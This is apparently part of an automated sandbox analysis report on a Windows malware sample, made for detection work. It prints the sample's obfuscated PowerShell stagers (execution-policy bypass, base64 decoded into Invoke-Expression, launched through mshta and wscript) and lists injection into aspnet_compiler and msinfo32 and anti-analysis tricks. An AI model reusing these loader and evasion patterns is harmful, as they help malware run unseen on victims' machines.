                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0041607F pushad ; iretd 12_2_00416091
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00414986 push ds; iretd 12_2_004149AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0041298E pushfd ; iretd 12_2_0041299A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00414B2D push edi; iretd 12_2_00414B3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00414B33 push edi; iretd 12_2_00414B3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00403380 push eax; ret 12_2_00403382
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00408442 push 00000074h; iretd 12_2_00408478
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00416C91 push FAC063A2h; retf 12_2_00416CB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004176FD push ebp; ret 12_2_004176FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00404E85 push esi; ret 12_2_00404EAF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_017809AD push ecx; mov dword ptr [esp], ecx 12_2_017809B6
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04E409AD push ecx; mov dword ptr [esp], ecx 16_2_04E409B6
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EBE2A0 push ecx; ret 16_2_02EBE330
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EB62BE push ebx; ret 16_2_02EB62F5
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EBC3DF push FFFFFFD0h; retf 16_2_02EBC432
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EB437A push ebp; ret 16_2_02EB437B
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EA50BF push 00000074h; iretd 16_2_02EA50F5
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EAF60B pushfd ; iretd 16_2_02EAF617
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EA1B02 push esi; ret 16_2_02EA1B2C
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EB390E push FAC063A2h; retf 16_2_02EB3935
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D144C4 push es; retf 16_2_04D144C5
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D1464C push esp; retf 16_2_04D14662
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D1C0CA push ds; retf 16_2_04D1C0CC
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D11D6F push esi; iretd 16_2_04D11D70
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D15FC8 push edi; iretd 16_2_04D15FC7
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D15FB6 push edi; iretd 16_2_04D15FC7
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D1AFBB push ss; ret 16_2_04D1AFBC
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D1BF1B pushad ; retf 16_2_04D1BF1E
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D15F1E push ds; iretd 16_2_04D15F46
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_04D14844 push ebx; iretd 16_2_04D14846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msinfo32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msinfo32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                      Source: C:\Windows\SysWOW64\msinfo32.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_017C096E rdtsc 12_2_017C096E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7513
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2133
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3692
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5981
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\msinfo32.exe API coverage: 3.1 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500 Thread sleep count: 7513 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864 Thread sleep count: 2133 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4260 Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7672 Thread sleep time: -40000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\msinfo32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 16_2_02EBCAB0 FindFirstFileW,FindNextFileW,FindClose, 16_2_02EBCAB0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\msinfo32.exe Process queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00417DB3 LdrLoadDll, 12_2_00417DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h] 12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0183C188 mov eax, dword ptr fs:[00000030h] 12_2_0183C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0180019F mov eax, dword ptr fs:[00000030h] 12_2_0180019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0177C156 mov eax, dword ptr fs:[00000030h] 12_2_0177C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_018311A4 mov eax, dword ptr fs:[00000030h] 12_2_018311A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01787152 mov eax, dword ptr fs:[00000030h] 12_2_01787152
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01786154 mov eax, dword ptr fs:[00000030h] 12_2_01786154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01779148 mov eax, dword ptr fs:[00000030h] 12_2_01779148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0177B136 mov eax, dword ptr fs:[00000030h] 12_2_0177B136
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_018461C3 mov eax, dword ptr fs:[00000030h] 12_2_018461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01781131 mov eax, dword ptr fs:[00000030h] 12_2_01781131
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_018551CB mov eax, dword ptr fs:[00000030h] 12_2_018551CB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_017B0124 mov eax, dword ptr fs:[00000030h] 12_2_017B0124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_018561E5 mov eax, dword ptr fs:[00000030h] 12_2_018561E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_017B01F8 mov eax, dword ptr fs:[00000030h] 12_2_017B01F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01840115 mov eax, dword ptr fs:[00000030h] 12_2_01840115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h] 12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017851ED mov eax, dword ptr fs:[00000030h]12_2_017851ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov ecx, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BD1D0 mov eax, dword ptr fs:[00000030h]12_2_017BD1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BD1D0 mov ecx, dword ptr fs:[00000030h]12_2_017BD1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov ecx, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179B1B0 mov eax, dword ptr fs:[00000030h]12_2_0179B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855152 mov eax, dword ptr fs:[00000030h]12_2_01855152
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01819179 mov eax, dword ptr fs:[00000030h]12_2_01819179
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C0185 mov eax, dword ptr fs:[00000030h]12_2_017C0185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov ecx, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AC073 mov eax, dword ptr fs:[00000030h]12_2_017AC073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01782050 mov eax, dword ptr fs:[00000030h]12_2_01782050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB052 mov eax, dword ptr fs:[00000030h]12_2_017AB052
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018460B8 mov eax, dword ptr fs:[00000030h]12_2_018460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018460B8 mov ecx, dword ptr fs:[00000030h]12_2_018460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A020 mov eax, dword ptr fs:[00000030h]12_2_0177A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C020 mov eax, dword ptr fs:[00000030h]12_2_0177C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018550D9 mov eax, dword ptr fs:[00000030h]12_2_018550D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018020DE mov eax, dword ptr fs:[00000030h]12_2_018020DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C0F0 mov eax, dword ptr fs:[00000030h]12_2_0177C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C20F0 mov ecx, dword ptr fs:[00000030h]12_2_017C20F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017880E9 mov eax, dword ptr fs:[00000030h]12_2_017880E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A0E3 mov ecx, dword ptr fs:[00000030h]12_2_0177A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A50E4 mov eax, dword ptr fs:[00000030h]12_2_017A50E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A50E4 mov ecx, dword ptr fs:[00000030h]12_2_017A50E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A90DB mov eax, dword ptr fs:[00000030h]12_2_017A90DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182705E mov ebx, dword ptr fs:[00000030h]12_2_0182705E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182705E mov eax, dword ptr fs:[00000030h]12_2_0182705E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855060 mov eax, dword ptr fs:[00000030h]12_2_01855060
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B909C mov eax, dword ptr fs:[00000030h]12_2_017B909C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AD090 mov eax, dword ptr fs:[00000030h]12_2_017AD090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AD090 mov eax, dword ptr fs:[00000030h]12_2_017AD090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01785096 mov eax, dword ptr fs:[00000030h]12_2_01785096
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178208A mov eax, dword ptr fs:[00000030h]12_2_0178208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D08D mov eax, dword ptr fs:[00000030h]12_2_0177D08D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
